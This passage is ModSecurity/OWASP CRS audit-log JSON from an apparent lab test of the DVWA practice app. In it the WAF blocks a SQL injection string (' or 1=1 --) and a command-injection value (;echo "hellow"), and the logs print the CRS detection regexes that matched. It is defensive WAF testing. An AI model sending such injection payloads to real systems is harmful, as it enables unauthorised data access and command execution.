\"192.168.75.136\"] [uri \"/dvwa/\"] [unique_id \"WRc1lX8AAQEAAAkXs@gAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":416,"p2":1412,"p3":96,"p4":780,"p5":80,"sr":39,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:35 --0400","transaction_id":"WRc1m38AAQEAAAkYuFAAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1m38AAQEAAAkYuFAAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":382,"p2":1463,"p3":92,"p4":462,"p5":78,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:35 --0400","transaction_id":"WRc1m38AAQEAAAkYuFEAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1m38AAQEAAAkYuFEAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":388,"p2":1416,"p3":128,"p4":423,"p5":73,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:39 --0400","transaction_id":"WRc1n38AAQEAAAkYuFIAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1n38AAQEAAAkYuFIAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":421,"p2":2224,"p3":0,"p4":0,"p5":137,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:44 --0400","transaction_id":"WRc1pH8AAQEAAAkYuFMAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1pH8AAQEAAAkYuFMAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":758,"p2":1947,"p3":198,"p4":761,"p5":124,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:44 --0400","transaction_id":"WRc1pH8AAQEAAAkYuFQAAAAD","remote_address":"192.168.75.153","remote_port":39272,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRc1pH8AAQEAAAkYuFQAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":527,"p2":1898,"p3":102,"p4":397,"p5":96,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:51 --0400","transaction_id":"WRc1q38AAQEAAAkZ0BoAAAAE","remote_address":"192.168.75.153","remote_port":39274,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"37"},"body":["ip=%3Becho+%22hellow%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\x22hellow found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname 